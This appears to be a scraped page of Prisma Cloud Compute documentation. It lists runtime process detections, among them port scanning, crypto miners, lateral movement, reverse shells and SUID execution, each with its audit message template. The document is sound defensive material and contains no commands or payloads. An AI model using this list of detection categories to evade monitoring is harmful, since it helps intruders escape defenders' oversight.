This document summarizes all the runtime audits (detections) that are available in Prisma Cloud Compute. For each detection, you can learn more about what it actually detects, how to enable or disable it, avoid false positives, relevant workloads (Containers, Hosts, Serverless and App-embedded), and if the audit also generates an incident.
Runtime detections for processes
Triggers an incident
Indicates when a process that is not part of the runtime model was spawned.
Port Scanning Process
Indicates a process was spawned, that is identified as being used for port scanning.
<process> launched and is identified as a process used for port scanning
Explicitly Denied Process
Indicates that a process listed in the
Denied & fallbacklist was spawned.
<process> launched and is explicitly denied by runtime rule. Full command <command>
Containers, Host, Serverless, App-embedded
Indicates a modified process was spawned. A modified process is a process whose binary was created or modified after the container was started.
A modified executable <process> was launched
Indicates that a package binary file was replaced during image build. This detection will generate an audit when a process is started from an altered binary.
<process path> launched and is detected as an altered or corrupted package binary. The file metadata doesn’t match what’s reported by the package manager.
Crypto Miner Process
Indicates a process that is identified as a crypto miner was spawned.
<process> launched and is identified as a crypto miner. Full command: <path>
Containers, Hosts, Serverless, App-embedded
Lateral Movement Process
Indicates a process that is used for lateral movement was spawned.
<process> launched and is identified as a process used for lateral movement. Full command: <path>
Temporary File System Process
Indicates that a process is running from a temporary file system.
<process> launched from a temporary file storage, which usually indicates malicious activity.
Indicates that the Prisma Cloud process policy was hijacked
Possible tampering of Defender policy detected.
Indicates that a process was identified as running a reverse shell
<processes> is a reverse shell . Full command: <path>
Indicates that a process is running with high priviliges, by watching for binaries with the setuid bit that are executed.
<process> launched and detected as a process started with SUID. Full command: <path>
Unknown Origin Binary by service
Indicates detection of binaries created by a service without a package manager.
<process path> launched from a binary file which was written by <creating process path> that is not known OS distribution package manager.
Unknown Origin Binary by user